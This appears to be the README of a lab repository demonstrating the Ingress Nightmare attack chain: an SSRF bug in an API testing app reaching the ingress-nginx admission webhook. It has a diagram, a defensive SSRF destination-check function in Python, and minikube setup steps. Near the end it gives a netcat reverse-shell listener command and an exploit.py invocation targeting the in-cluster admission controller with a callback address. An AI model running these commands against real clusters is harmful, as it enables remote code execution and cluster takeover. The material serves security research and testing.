Assume an attacker on an external network who triggers Ingress Nightmare through a server-side request forgery (SSRF) vulnerability in an API testing app.
```mermaid
graph TB
    Attacker["😈 External Attacker"]:::attackerStyle
    subgraph "k8s cluster"
        subgraph "ingress-nginx namespace"
            ingressNginx["Ingress-NGINX Controller"]:::k8s
            admission["😈 Admission Controller"]:::k8s
        end
        subgraph "default namespace"
            pocService["API Testing App"]:::k8s
            ssrf["⚠️ SSRF Vulnerability"]:::vuln
        end
    end
    Attacker -->|"1.sends requests"| ingressNginx
    ingressNginx -->|"2.routes traffic"| pocService
    admission -->|"validates config"| ingressNginx
    pocService -- "3.sends malicious requests (SSRF)" --> admission
    classDef k8s fill:#326ce5,stroke:#fff,stroke-width:2px,color:#fff;
    classDef k8s-pwn fill:#eea29a,stroke:#fff,stroke-width:2px,color:#fff;
    classDef attackerStyle fill:#eea29a,stroke:#000,stroke-width:2px,color:#fff;
    classDef vuln fill:#fff3cd,stroke:#ff9800,stroke-width:2px,color:#d35400;
    class ingressNginx,pocApp,pocService,pocPod k8s;
    class admission k8s-pwn;
    class Attacker attackerStyle;
    class ssrf vuln;
```
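Step 3 in the diagram works only because the API testing app fetches whatever URL it is given, including the in-cluster admission webhook. As an added example (not code from this repository), here is a destination check such an app could run before making an outbound request; the function names, the suffix list and the injectable resolver are assumptions of this example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy: names under these suffixes only exist inside the cluster.
INTERNAL_SUFFIXES = (".svc", ".cluster.local")

def system_resolver(host, port):
    """Resolve with the pod's own DNS configuration (search domains included)."""
    return [ai[4][0] for ai in socket.getaddrinfo(host, port, proto=socket.IPPROTO_TCP)]

def is_internal_ip(addr):
    """True for anything that is not a publicly routable unicast address."""
    ip = ipaddress.ip_address(addr.split("%")[0])  # drop an IPv6 scope id
    return ip.is_multicast or not ip.is_global

def check_destination(url, resolver=system_resolver):
    """Return (allowed, reason) for a user-supplied URL the app is asked to fetch."""
    try:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False, "unsupported scheme or missing host"
    host = parts.hostname.rstrip(".")
    try:
        # IP literal: judge it directly, no DNS involved.
        return (False, "internal address") if is_internal_ip(host) else (True, "ok")
    except ValueError:
        pass  # not an IP literal, treat it as a DNS name
    if host.endswith(INTERNAL_SUFFIXES):
        return False, "cluster-internal name"
    try:
        addrs = resolver(host, port)
    except OSError:
        return False, "resolution failed"
    # Short names such as "service.namespace" pass the suffix test but are
    # completed by the pod's DNS search domains, so the resolved IPs decide.
    if not addrs or any(is_internal_ip(a) for a in addrs):
        return False, "resolves to internal address"
    return True, "ok"
```

The check only holds if the app then connects to the addresses that were validated and re-runs it on every redirect; a NetworkPolicy limiting which pods can reach the admission webhook covers the same path at the network layer.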
This environment requires the following components to be installed on your machine:
- Docker
- kubectl
- minikube
```bash
cd poc-env
./setup.sh
```

P.S. This will add a DNS entry for `ingress-nginx-controller` to `/etc/hosts` on your host.
- Start your reverse shell listener:

  ```bash
  nc -lvnp 4444
  ```

- Run the exploit script in another terminal:

  ```bash
  python3 exploit.py http://ingress-nginx-controller.ingress-nginx.svc.cluster.local https://ingress-nginx-controller-admission.ingress-nginx.svc.cluster.local:443 192.168.49.1:4444 reviews/match-cn.json
  ```

P.S. `192.168.49.1` may be different.